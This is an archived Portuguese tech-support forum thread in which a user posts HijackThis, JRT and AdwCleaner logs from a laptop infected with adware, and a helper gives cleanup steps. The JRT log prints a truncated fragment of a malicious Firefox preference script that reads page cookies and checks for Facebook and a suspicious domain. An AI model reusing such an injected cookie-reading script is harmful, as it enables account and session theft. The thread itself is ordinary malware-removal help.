Ir para conteúdo

Arquivado

Este tópico foi arquivado e está fechado para novas respostas.

Weick

[Arquivado] Notebook lento, travando e programas fechando sem mot

Recommended Posts

Oi pessoal,

Poderiam dar uma olhada nesse log pra mim? Estou com esse notebook positivo travando MUUUUUITO e fechando programas sozinho, sem motivo aparente. Tô achando que é treta de malware (o usuário não é dos mais responsáveis).

 

Logfile of Trend Micro HijackThis v2.0.4
Scan saved at 14:16:02, on 20/07/2014
Platform: Unknown Windows (WinNT 6.02.1008)
MSIE: Internet Explorer v10.0 (10.00.9200.17028)
Boot mode: Normal
Running processes:
C:\Program Files (x86)\Intel\Intel® ME FW Recovery Agent\bin\ismagent.exe
C:\Program Files\AVAST Software\Avast\AvastUI.exe
C:\Program Files (x86)\Intel\Intel® ME FW Recovery Agent\bin\updateui.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Trend Micro\HiJackThis\HiJackThis.exe
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,SearchAssistant =
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,CustomizeSearch =
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Local Page = C:\Windows\SysWOW64\blank.htm
R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName =
F2 - REG:system.ini: UserInit=userinit.exe
O2 - BHO: avast! Online Security - {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} - C:\Program Files\AVAST Software\Avast\aswWebRepIE.dll
O2 - BHO: Microsoft SkyDrive Pro Browser Helper - {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} - C:\PROGRA~2\MICROS~1\Office15\GROOVEEX.DLL
O4 - HKLM\..\Run: [iAStorIcon] C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IAStorIconLaunch.exe "C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IAStorIcon.exe" 60
O4 - HKLM\..\Run: [AvastUI.exe] "C:\Program Files\AVAST Software\Avast\AvastUI.exe" /nogui
O4 - HKLM\..\Run: [Adobe ARM] "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe"
O4 - HKCU\..\Run: [uTorrent] "C:\Users\Tião'\AppData\Roaming\uTorrent\uTorrent.exe" /MINIMIZED
O4 - HKCU\..\Run: [Facebook Update] "C:\Users\Tião'\AppData\Local\Facebook\Update\FacebookUpdate.exe" /c /nocrashserver
O4 - HKCU\..\Run: [skype] "C:\Program Files (x86)\Skype\Phone\Skype.exe" /minimized /regrun
O4 - Startup: area-de-trabalho.lnk = C:\Windows\explorer.exe
O8 - Extra context menu item: &Enviar para o OneNote - res://C:\PROGRA~2\MICROS~1\Office14\ONBttnIE.dll/105
O8 - Extra context menu item: E&xport to Microsoft Excel - res://C:\PROGRA~1\MICROS~1\Office15\EXCEL.EXE/3000
O8 - Extra context menu item: E&xportar para o Microsoft Excel - res://C:\PROGRA~2\MICROS~1\Office14\EXCEL.EXE/3000
O11 - Options group: [ACCELERATED_GRAPHICS] Accelerated graphics
O18 - Protocol: osf - {D924BDC6-C83A-4BD5-90D0-095128A113D1} - C:\Program Files (x86)\Microsoft Office\Office15\MSOSB.DLL
O18 - Protocol: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\PROGRA~2\COMMON~1\Skype\SKYPE4~1.DLL
O18 - Filter hijack: text/xml - {807583E5-5146-11D5-A672-00B0D022E945} - C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE15\MSOXMLMF.DLL
O23 - Service: Adobe Acrobat Update Service (AdobeARMservice) - Adobe Systems Incorporated - C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
O23 - Service: @%SystemRoot%\system32\Alg.exe,-112 (ALG) - Unknown owner - C:\Windows\System32\alg.exe (file missing)
O23 - Service: Serviço do Mundo Positivo (AppManagerService) - Positivo Informática S.A. - C:\Program Files (x86)\Positivo Informática\Positivo Experience\Positivo Experience\MundoPositivoService.exe
O23 - Service: avast! Antivirus - AVAST Software - C:\Program Files\AVAST Software\Avast\AvastSvc.exe
O23 - Service: Battery Manager Service (BatteryManagerSrv) - Positivo Informática S.A - C:\Program Files (x86)\Positivo Informática\Positivo Experience\Positivo Bateria\BatteryManagerService.exe
O23 - Service: Intel® Content Protection HECI Service (cphs) - Intel Corporation - C:\Windows\SysWow64\IntelCpHeciSvc.exe
O23 - Service: @%SystemRoot%\system32\efssvc.dll,-100 (EFS) - Unknown owner - C:\Windows\System32\lsass.exe (file missing)
O23 - Service: @%systemroot%\system32\fxsresm.dll,-118 (Fax) - Unknown owner - C:\Windows\system32\fxssvc.exe (file missing)
O23 - Service: Serviço do Google Update (gupdate) (gupdate) - Google Inc. - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
O23 - Service: Serviço do Google Update (gupdatem) (gupdatem) - Google Inc. - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
O23 - Service: Tecnologia de armazenamento Intel® Rapid (IAStorDataMgrSvc) - Intel Corporation - C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IAStorDataMgrSvc.exe
O23 - Service: Intel® Capability Licensing Service Interface - Intel® Corporation - C:\Program Files\Intel\iCLS Client\HeciServer.exe
O23 - Service: Intel® ME Service - Intel Corporation - C:\Program Files (x86)\Intel\Intel® Management Engine Components\FWService\IntelMeFWService.exe
O23 - Service: Intel® Dynamic Application Loader Host Interface Service (jhi_service) - Intel Corporation - C:\Program Files (x86)\Intel\Intel® Management Engine Components\DAL\jhi_service.exe
O23 - Service: @keyiso.dll,-100 (KeyIso) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: Intel® Management and Security Application Local Management Service (LMS) - Intel Corporation - C:\Program Files (x86)\Intel\Intel® Management Engine Components\LMS\LMS.exe
O23 - Service: McAfee SiteAdvisor Service - Unknown owner - c:\PROGRA~2\mcafee\SITEAD~1\mcsacore.exe (file missing)
O23 - Service: @comres.dll,-2797 (MSDTC) - Unknown owner - C:\Windows\System32\msdtc.exe (file missing)
O23 - Service: @%SystemRoot%\System32\netlogon.dll,-102 (Netlogon) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: nProtect GameGuard Service (npggsvc) - Unknown owner - C:\Windows\system32\GameMon.des.exe (file missing)
O23 - Service: @%systemroot%\system32\Locator.exe,-2 (RpcLocator) - Unknown owner - C:\Windows\system32\locator.exe (file missing)
O23 - Service: @%SystemRoot%\system32\samsrv.dll,-1 (SamSs) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: Skype Updater (SkypeUpdate) - Skype Technologies - C:\Program Files (x86)\Skype\Updater\Updater.exe
O23 - Service: @%SystemRoot%\system32\snmptrap.exe,-3 (SNMPTRAP) - Unknown owner - C:\Windows\System32\snmptrap.exe (file missing)
O23 - Service: @%systemroot%\system32\spoolsv.exe,-1 (Spooler) - Unknown owner - C:\Windows\System32\spoolsv.exe (file missing)
O23 - Service: @%SystemRoot%\system32\sppsvc.exe,-101 (sppsvc) - Unknown owner - C:\Windows\system32\sppsvc.exe (file missing)
O23 - Service: @%SystemRoot%\system32\ui0detect.exe,-101 (UI0Detect) - Unknown owner - C:\Windows\system32\UI0Detect.exe (file missing)
O23 - Service: Intel® Management and Security Application User Notification Service (UNS) - Intel Corporation - C:\Program Files (x86)\Intel\Intel® Management Engine Components\UNS\UNS.exe
O23 - Service: @%SystemRoot%\system32\vaultsvc.dll,-1003 (VaultSvc) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: @%SystemRoot%\system32\vds.exe,-100 (vds) - Unknown owner - C:\Windows\System32\vds.exe (file missing)
O23 - Service: @%systemroot%\system32\vssvc.exe,-102 (VSS) - Unknown owner - C:\Windows\system32\vssvc.exe (file missing)
O23 - Service: @%systemroot%\system32\wbengine.exe,-104 (wbengine) - Unknown owner - C:\Windows\system32\wbengine.exe (file missing)
O23 - Service: @%ProgramFiles%\Windows Defender\MpAsDesc.dll,-310 (WinDefend) - Unknown owner - C:\Program Files (x86)\Windows Defender\MsMpEng.exe (file missing)
O23 - Service: @%Systemroot%\system32\wbem\wmiapsrv.exe,-110 (wmiApSrv) - Unknown owner - C:\Windows\system32\wbem\WmiApSrv.exe (file missing)
O23 - Service: @%PROGRAMFILES%\Windows Media Player\wmpnetwk.exe,-101 (WMPNetworkSvc) - Unknown owner - C:\Program Files (x86)\Windows Media Player\wmpnetwk.exe (file missing)
--
End of file - 7985 bytes
Abraço,
Weick

Compartilhar este post


Link para o post
Compartilhar em outros sites
Boa Tarde! Weick


|- Abra o HijackThis.

|- Clique: Do a system scan only


O4 - HKLM\..\Run: [Adobe ARM] "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe"


O4 - HKCU\..\Run: [Facebook Update] "C:\Users\Tião'\AppData\Local\Facebook\Update\FacebookUpdate.exe" /c /nocrashserver


O4 - Startup: area-de-trabalho.lnk = C:\Windows\explorer.exe


|- Marque estas entradas que estão em vermelho! ( Assinale as caixinhas! )

|- Clique,para finalizá-las,em Fix checked.


-/-


|- Baixe: < 1268r49.png > ( ... by Oleg N. Scherbakov )

|- Salve-o no desktop!

|- Desabilite seu antivírus!

|- Para Windows 7,clique direito em JRT.exe e execute-o ... Executar_Administrador.jpg

|- Aguarde a conclusão e poste o relatório. ( JRT.txt )


-/-


|- Baixe: < AdwCleaner_Logo2_zps580bcd78.jpg > ( ... par Xplode )


|- Ao acessar,clique na imagem: < download-button-jdownloads.png >


|- Salve-o no desktop!

|- Clique direito em adwcleaner.exe,e escolha sua execução como Executar_Administrador.jpg


advz4z8Y.jpg


|- Ps: Dê início ao scan,clicando em "Examinar".

|- Ao concluir,clique "Limpar" >> Ok >> Ok >> Ok.

|- Copie o log ou clique "Relatório".

|- Poste: < C:\AdwCleaner\AdwCleaner[s0].txt >


Abs!

Compartilhar este post


Link para o post
Compartilhar em outros sites
Oi, DigRam!

Obrigado pelas orientações. Seguem os logs.


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Junkware Removal Tool (JRT) by Thisisu

Version: 6.1.4 (04.06.2014:1)

OS: Windows 8 Single Language x64

Ran by TiÆo' on 20/07/2014 at 16:55:10,60

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~





~~~ Services




~~~ Registry Values




~~~ Registry Keys


Successfully deleted: [Registry Key] HKEY_CLASSES_ROOT\CLSID\{1AA60054-57D9-4F99-9A55-D0FBFBE7ECD3}

Successfully deleted: [Registry Key] HKEY_CURRENT_USER\Software\baidu

Successfully deleted: [Registry Key] HKEY_CURRENT_USER\Software\bonanzadealslive

Successfully deleted: [Registry Key] HKEY_CURRENT_USER\Software\dsiteproducts

Successfully deleted: [Registry Key] HKEY_CURRENT_USER\Software\iminent

Successfully deleted: [Registry Key] HKEY_CURRENT_USER\Software\installcore

Successfully deleted: [Registry Key] HKEY_CURRENT_USER\Software\softonic

Successfully deleted: [Registry Key] HKEY_CURRENT_USER\Software\systweak

Successfully deleted: [Registry Key] HKEY_CURRENT_USER\Software\AppDataLow\software\crossrider

Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\Software\baidu

Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\Software\bonanzadealslive

Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\Software\desksvc

Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\Software\iminent

Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\Software\Microsoft\Tracing\iminent_rasapi32

Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\Software\Microsoft\Tracing\iminent_rasmancs

Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Uninstall\searchthewebarp




~~~ Files




~~~ Folders


Successfully deleted: [Folder] "C:\ProgramData\apn"

Successfully deleted: [Folder] "C:\ProgramData\baidu"

Successfully deleted: [Folder] "C:\ProgramData\bonanzadealslive"

Successfully deleted: [Folder] "C:\ProgramData\savesenselive"

Successfully deleted: [Folder] "C:\Users\TiÆo'\AppData\Roaming\baidu"

Successfully deleted: [Folder] "C:\Users\TiÆo'\AppData\Roaming\systweak"

Successfully deleted: [Folder] "C:\Program Files (x86)\bonanzadeals"

Successfully deleted: [Folder] "C:\Program Files (x86)\bonanzadealslive"

Successfully deleted: [Folder] "C:\Program Files (x86)\savesenselive"

Successfully deleted: [Folder] "C:\Program Files (x86)\winzip registry optimizer"




~~~ FireFox


Successfully deleted: [File] C:\Users\TiÆo'\AppData\Roaming\mozilla\firefox\profiles\nmi2j58p.default\user.js

Successfully deleted the following from C:\Users\TiÆo'\AppData\Roaming\mozilla\firefox\profiles\nmi2j58p.default\prefs.js


user_pref("extensions.IJ9VKm.scode", "(function(){try{var url=(window.self.location.href + document.cookie);if(url.indexOf(\"acebook\")>-1||url.indexOf(\"warnalert11.com\")>-1




~~~ Event Viewer Logs were cleared






~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Scan was completed on 20/07/2014 at 17:13:33,04

End of JRT log

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~








=-=






# AdwCleaner v3.216 - Relatório criado 20/07/2014 às 19:20:45

# Atualizado 17/07/2014 por Xplode

# Sistema Operacional : Windows 8 Single Language (64 bits)

# Usuário : Tião' - TIÃO

# Executando de : C:\Users\Tião'\Desktop\adwcleaner_3.216.exe

# Opção : Limpar


***** [ Serviços ] *****



***** [ Arquivos / Pastas ] *****


Pasta Deletada : C:\ProgramData\IePluginService

Pasta Deletada : C:\ProgramData\AlawarWrapper

Pasta Deletada : C:\Program Files (x86)\Bench

Pasta Deletada : C:\Program Files (x86)\FindRight

Pasta Deletada : C:\Program Files (x86)\IminentToolbar

Pasta Deletada : C:\Program Files (x86)\predm

Pasta Deletada : C:\Program Files (x86)\Common Files\337

Pasta Deletada : C:\Users\Administrador\AppData\Local\torch

Pasta Deletada : C:\Users\Convidado\AppData\Local\torch

Pasta Deletada : C:\Users\Public\Documents\ShopperPro

Pasta Deletada : C:\Users\Tião'\AppData\Local\BonanzaDealsLive

Pasta Deletada : C:\Users\Tião'\AppData\Local\SaveSenseLive

Pasta Deletada : C:\Users\Tião'\AppData\Local\torch

Pasta Deletada : C:\Users\Tião'\AppData\Roaming\DigitalSites

Pasta Deletada : C:\Users\Tião'\AppData\Roaming\Nico Mak Computing

Pasta Deletada : C:\Users\Tião'\AppData\Roaming\UpdaterEX

Pasta Deletada : C:\Users\Tião'\AppData\Roaming\Mozilla\Firefox\Profiles\nmi2j58p.default\Extensions\a8_o@eyiyu-.com

Pasta Deletada : C:\Users\Administrador\AppData\Local\Google\Chrome\User Data\Default\Extensions\maagjljbhbikhdpmjfcpgbdkgcikkoee

Pasta Deletada : C:\Users\Convidado\AppData\Local\Google\Chrome\User Data\Default\Extensions\maagjljbhbikhdpmjfcpgbdkgcikkoee

Arquivo Deletada : C:\Windows\System32\roboot64.exe

Arquivo Deletada : C:\Users\Tião'\AppData\Local\Google\Chrome\User Data\Default\Extensions\newtabv2.crx

Arquivo Deletada : C:\Windows\Tasks\bench-sys.job

Arquivo Deletada : C:\Windows\System32\Tasks\bench-sys

Arquivo Deletada : C:\Windows\System32\Tasks\Desk 365 RunAsStdUser

Arquivo Deletada : C:\Windows\Tasks\Digital Sites.job

Arquivo Deletada : C:\Windows\System32\Tasks\Digital Sites


***** [ Atalhos ] *****



***** [ Registro ] *****


Chave Deletedo : HKLM\SOFTWARE\Google\Chrome\Extensions\pkndmigholgfjlniaohblojbhgjbkakn

Chave Deletedo : HKCU\Software\SIEN SA

Chave Deletedo : HKLM\SOFTWARE\Classes\AmiBs.Installer

Chave Deletedo : HKLM\SOFTWARE\Classes\AmiBs.Installer.1

Chave Deletedo : HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\BonanzaDealsLive.exe

Chave Deletedo : HKLM\SYSTEM\CurrentControlSet\Services\Eventlog\Application\DeskSvc

Chave Deletedo : HKLM\SOFTWARE\Classes\AppID\{0E4B2CAB-B859-4C57-B96E-63DDEC692BC4}

Chave Deletedo : HKLM\SOFTWARE\Classes\AppID\{C292AD0A-C11F-479B-B8DB-743E72D283B0}

Chave Deletedo : HKLM\SOFTWARE\Classes\CLSID\{02054E11-5113-4BE3-8153-AA8DFB5D3761}

Chave Deletedo : HKLM\SOFTWARE\Classes\CLSID\{A6FEED89-3BCD-4D19-9DC2-3E613A80A2A4}

Chave Deletedo : HKLM\SOFTWARE\Classes\CLSID\{D40753C7-8A59-4C1F-BE88-C300F4624D5B}

Chave Deletedo : HKLM\SOFTWARE\Classes\Interface\{021B4049-F57D-4565-A693-FD3B04786BFA}

Chave Deletedo : HKLM\SOFTWARE\Classes\Interface\{0362AA09-808D-48E9-B360-FB51A8CBCE09}

Chave Deletedo : HKLM\SOFTWARE\Classes\Interface\{06844020-CD0B-3D3D-A7FE-371153013E49}

Chave Deletedo : HKLM\SOFTWARE\Classes\Interface\{0ADC01BB-303B-3F8E-93DA-12C140E85460}

Chave Deletedo : HKLM\SOFTWARE\Classes\Interface\{10D3722F-23E6-3901-B6C1-FF6567121920}

Chave Deletedo : HKLM\SOFTWARE\Classes\Interface\{1675E62B-F911-3B7B-A046-EB57261212F3}

Chave Deletedo : HKLM\SOFTWARE\Classes\Interface\{192929F2-9273-3894-91B0-F54671C4C861}

Chave Deletedo : HKLM\SOFTWARE\Classes\Interface\{2932897E-3036-43D9-8A64-B06447992065}

Chave Deletedo : HKLM\SOFTWARE\Classes\Interface\{2DE92D29-A042-3C37-BFF8-07C7D8893EFA}

Chave Deletedo : HKLM\SOFTWARE\Classes\Interface\{32B80AD6-1214-45F4-994E-78A5D482C000}

Chave Deletedo : HKLM\SOFTWARE\Classes\Interface\{3A8E103F-B2B7-3BEF-B3B0-88E29B2420E4}

Chave Deletedo : HKLM\SOFTWARE\Classes\Interface\{478CE5D3-D38E-3FFE-8DBE-8C4A0F1C4D8D}

Chave Deletedo : HKLM\SOFTWARE\Classes\Interface\{48B7DA4E-69ED-39E3-BAD5-3E3EFF22CFB0}

Chave Deletedo : HKLM\SOFTWARE\Classes\Interface\{5982F405-44E4-3BBB-BAC4-CF8141CBBC5C}

Chave Deletedo : HKLM\SOFTWARE\Classes\Interface\{5D8C3CC3-3C05-38A1-B244-924A23115FE9}

Chave Deletedo : HKLM\SOFTWARE\Classes\Interface\{641593AF-D9FD-30F7-B783-36E16F7A2E08}

Chave Deletedo : HKLM\SOFTWARE\Classes\Interface\{711FC48A-1356-3932-94D8-A8B733DBC7E4}

Chave Deletedo : HKLM\SOFTWARE\Classes\Interface\{72227B7F-1F02-3560-95F5-592E68BACC0C}

Chave Deletedo : HKLM\SOFTWARE\Classes\Interface\{7B5E8CE3-4722-4C0E-A236-A6FF731BEF37}

Chave Deletedo : HKLM\SOFTWARE\Classes\Interface\{890D4F59-5ED0-3CB4-8E0E-74A5A86E7ED0}

Chave Deletedo : HKLM\SOFTWARE\Classes\Interface\{8C68913C-AC3C-4494-8B9C-984D87C85003}

Chave Deletedo : HKLM\SOFTWARE\Classes\Interface\{8D019513-083F-4AA5-933F-7D43A6DA82C4}

Chave Deletedo : HKLM\SOFTWARE\Classes\Interface\{923F6FB8-A390-370E-A0D2-DD505432481D}

Chave Deletedo : HKLM\SOFTWARE\Classes\Interface\{9BBB26EF-B178-35D6-9D3D-B485F4279FE5}

Chave Deletedo : HKLM\SOFTWARE\Classes\Interface\{A62DDBE0-8D2A-339A-B089-8CBCC5CD322A}

Chave Deletedo : HKLM\SOFTWARE\Classes\Interface\{A82AD04D-0B8E-3A49-947B-6A69A8A9C96D}

Chave Deletedo : HKLM\SOFTWARE\Classes\Interface\{ADEB3CC9-A05D-4FCC-BD09-9025456AA3EA}

Chave Deletedo : HKLM\SOFTWARE\Classes\Interface\{B06D4521-D09C-3F41-8E39-9D784CCA2A75}

Chave Deletedo : HKLM\SOFTWARE\Classes\Interface\{C06DAD42-6F39-4CE1-83CC-9A8B9105E556}

Chave Deletedo : HKLM\SOFTWARE\Classes\Interface\{C2E799D0-43A5-3477-8A98-FC5F3677F35C}

Chave Deletedo : HKLM\SOFTWARE\Classes\Interface\{D16107CD-2AD5-46A8-BA59-303B7C32C500}

Chave Deletedo : HKLM\SOFTWARE\Classes\Interface\{D25B101F-8188-3B43-9D85-201F372BC205}

Chave Deletedo : HKLM\SOFTWARE\Classes\Interface\{D2BA7595-5E44-3F1E-880F-03B3139FA5ED}

Chave Deletedo : HKLM\SOFTWARE\Classes\Interface\{D35F5C81-17D9-3E1C-A1FC-4472542E1D25}

Chave Deletedo : HKLM\SOFTWARE\Classes\Interface\{D8FA96CA-B250-312C-AF34-4FF1DD72589D}

Chave Deletedo : HKLM\SOFTWARE\Classes\Interface\{DAFC1E63-3359-416D-9BC2-E7DCA6F7B0F3}

Chave Deletedo : HKLM\SOFTWARE\Classes\Interface\{DC5E5C44-80FD-3697-9E65-9F286D92F3E7}

Chave Deletedo : HKLM\SOFTWARE\Classes\Interface\{E1B4C9DE-D741-385F-981E-6745FACE6F01}

Chave Deletedo : HKLM\SOFTWARE\Classes\Interface\{E7B623F5-9715-3F9F-A671-D1485A39F8A2}

Chave Deletedo : HKLM\SOFTWARE\Classes\Interface\{ED916A7B-7C68-3198-B87D-2DABC30A5587}

Chave Deletedo : HKLM\SOFTWARE\Classes\Interface\{EFA1BDB2-BB3D-3D9A-8EB5-D0D22E0F64F4}

Chave Deletedo : HKLM\SOFTWARE\Classes\Interface\{F4CBF4DD-F8FE-35BA-BB7E-68304DAAB70B}

Chave Deletedo : HKLM\SOFTWARE\Classes\Interface\{FC32005D-E27C-32E0-ADFA-152F598B75E7}

Chave Deletedo : HKLM\SOFTWARE\Classes\TypeLib\{2BF2028E-3F3C-4C05-AB45-B2F1DCFE0759}

Chave Deletedo : HKLM\SOFTWARE\Classes\TypeLib\{C292AD0A-C11F-479B-B8DB-743E72D283B0}

Chave Deletedo : HKLM\SOFTWARE\Classes\TypeLib\{DB538320-D3C5-433C-BCA9-C4081A054FCF}

Chave Deletedo : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{3004627E-F8E9-4E8B-909D-316753CBA923}

Chave Deletedo : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{71E129FF-6C2A-4984-818C-7E2C998B8D99}

Chave Deletedo : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{EA34C851-D481-49F5-A356-3A8B0A8F3B7E}

Chave Deletedo : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{EF5625A3-37AB-4BDB-9875-2A3D91CD0DFD}

Chave Deletedo : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{71E129FF-6C2A-4984-818C-7E2C998B8D99}

Chave Deletedo : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{EA34C851-D481-49F5-A356-3A8B0A8F3B7E}

Chave Deletedo : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{EF5625A3-37AB-4BDB-9875-2A3D91CD0DFD}

Chave Deletedo : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\PreApproved\{3593C8B9-8E18-4B4B-B7D3-CB8BEB1AA42C}

Chave Deletedo : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\PreApproved\{A5A51D2A-505A-4D84-AFC6-E0FA87E47B8C}

Chave Deletedo : HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{68B81CCD-A80C-4060-8947-5AE69ED01199}

Chave Deletedo : HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{E6B969FB-6D33-48D2-9061-8BBD4899EB08}

Chave Deletedo : [x64] HKLM\SOFTWARE\Classes\Interface\{021B4049-F57D-4565-A693-FD3B04786BFA}

Chave Deletedo : [x64] HKLM\SOFTWARE\Classes\Interface\{0362AA09-808D-48E9-B360-FB51A8CBCE09}

Chave Deletedo : [x64] HKLM\SOFTWARE\Classes\Interface\{06844020-CD0B-3D3D-A7FE-371153013E49}

Chave Deletedo : [x64] HKLM\SOFTWARE\Classes\Interface\{0ADC01BB-303B-3F8E-93DA-12C140E85460}

Chave Deletedo : [x64] HKLM\SOFTWARE\Classes\Interface\{10D3722F-23E6-3901-B6C1-FF6567121920}

Chave Deletedo : [x64] HKLM\SOFTWARE\Classes\Interface\{1675E62B-F911-3B7B-A046-EB57261212F3}

Chave Deletedo : [x64] HKLM\SOFTWARE\Classes\Interface\{192929F2-9273-3894-91B0-F54671C4C861}

Chave Deletedo : [x64] HKLM\SOFTWARE\Classes\Interface\{2932897E-3036-43D9-8A64-B06447992065}

Chave Deletedo : [x64] HKLM\SOFTWARE\Classes\Interface\{2DE92D29-A042-3C37-BFF8-07C7D8893EFA}

Chave Deletedo : [x64] HKLM\SOFTWARE\Classes\Interface\{32B80AD6-1214-45F4-994E-78A5D482C000}

Chave Deletedo : [x64] HKLM\SOFTWARE\Classes\Interface\{3A8E103F-B2B7-3BEF-B3B0-88E29B2420E4}

Chave Deletedo : [x64] HKLM\SOFTWARE\Classes\Interface\{478CE5D3-D38E-3FFE-8DBE-8C4A0F1C4D8D}

Chave Deletedo : [x64] HKLM\SOFTWARE\Classes\Interface\{48B7DA4E-69ED-39E3-BAD5-3E3EFF22CFB0}

Chave Deletedo : [x64] HKLM\SOFTWARE\Classes\Interface\{5982F405-44E4-3BBB-BAC4-CF8141CBBC5C}

Chave Deletedo : [x64] HKLM\SOFTWARE\Classes\Interface\{5D8C3CC3-3C05-38A1-B244-924A23115FE9}

Chave Deletedo : [x64] HKLM\SOFTWARE\Classes\Interface\{641593AF-D9FD-30F7-B783-36E16F7A2E08}

Chave Deletedo : [x64] HKLM\SOFTWARE\Classes\Interface\{711FC48A-1356-3932-94D8-A8B733DBC7E4}

Chave Deletedo : [x64] HKLM\SOFTWARE\Classes\Interface\{72227B7F-1F02-3560-95F5-592E68BACC0C}

Chave Deletedo : [x64] HKLM\SOFTWARE\Classes\Interface\{7B5E8CE3-4722-4C0E-A236-A6FF731BEF37}

Chave Deletedo : [x64] HKLM\SOFTWARE\Classes\Interface\{890D4F59-5ED0-3CB4-8E0E-74A5A86E7ED0}

Chave Deletedo : [x64] HKLM\SOFTWARE\Classes\Interface\{8C68913C-AC3C-4494-8B9C-984D87C85003}

Chave Deletedo : [x64] HKLM\SOFTWARE\Classes\Interface\{8D019513-083F-4AA5-933F-7D43A6DA82C4}

Chave Deletedo : [x64] HKLM\SOFTWARE\Classes\Interface\{923F6FB8-A390-370E-A0D2-DD505432481D}

Chave Deletedo : [x64] HKLM\SOFTWARE\Classes\Interface\{9BBB26EF-B178-35D6-9D3D-B485F4279FE5}

Chave Deletedo : [x64] HKLM\SOFTWARE\Classes\Interface\{A62DDBE0-8D2A-339A-B089-8CBCC5CD322A}

Chave Deletedo : [x64] HKLM\SOFTWARE\Classes\Interface\{A82AD04D-0B8E-3A49-947B-6A69A8A9C96D}

Chave Deletedo : [x64] HKLM\SOFTWARE\Classes\Interface\{ADEB3CC9-A05D-4FCC-BD09-9025456AA3EA}

Chave Deletedo : [x64] HKLM\SOFTWARE\Classes\Interface\{B06D4521-D09C-3F41-8E39-9D784CCA2A75}

Chave Deletedo : [x64] HKLM\SOFTWARE\Classes\Interface\{C06DAD42-6F39-4CE1-83CC-9A8B9105E556}

Chave Deletedo : [x64] HKLM\SOFTWARE\Classes\Interface\{C2E799D0-43A5-3477-8A98-FC5F3677F35C}

Chave Deletedo : [x64] HKLM\SOFTWARE\Classes\Interface\{D16107CD-2AD5-46A8-BA59-303B7C32C500}

Chave Deletedo : [x64] HKLM\SOFTWARE\Classes\Interface\{D25B101F-8188-3B43-9D85-201F372BC205}

Chave Deletedo : [x64] HKLM\SOFTWARE\Classes\Interface\{D2BA7595-5E44-3F1E-880F-03B3139FA5ED}

Chave Deletedo : [x64] HKLM\SOFTWARE\Classes\Interface\{D35F5C81-17D9-3E1C-A1FC-4472542E1D25}

Chave Deletedo : [x64] HKLM\SOFTWARE\Classes\Interface\{D8FA96CA-B250-312C-AF34-4FF1DD72589D}

Chave Deletedo : [x64] HKLM\SOFTWARE\Classes\Interface\{DAFC1E63-3359-416D-9BC2-E7DCA6F7B0F3}

Chave Deletedo : [x64] HKLM\SOFTWARE\Classes\Interface\{DC5E5C44-80FD-3697-9E65-9F286D92F3E7}

Chave Deletedo : [x64] HKLM\SOFTWARE\Classes\Interface\{E1B4C9DE-D741-385F-981E-6745FACE6F01}

Chave Deletedo : [x64] HKLM\SOFTWARE\Classes\Interface\{E7B623F5-9715-3F9F-A671-D1485A39F8A2}

Chave Deletedo : [x64] HKLM\SOFTWARE\Classes\Interface\{ED916A7B-7C68-3198-B87D-2DABC30A5587}

Chave Deletedo : [x64] HKLM\SOFTWARE\Classes\Interface\{EFA1BDB2-BB3D-3D9A-8EB5-D0D22E0F64F4}

Chave Deletedo : [x64] HKLM\SOFTWARE\Classes\Interface\{F4CBF4DD-F8FE-35BA-BB7E-68304DAAB70B}

Chave Deletedo : [x64] HKLM\SOFTWARE\Classes\Interface\{FC32005D-E27C-32E0-ADFA-152F598B75E7}

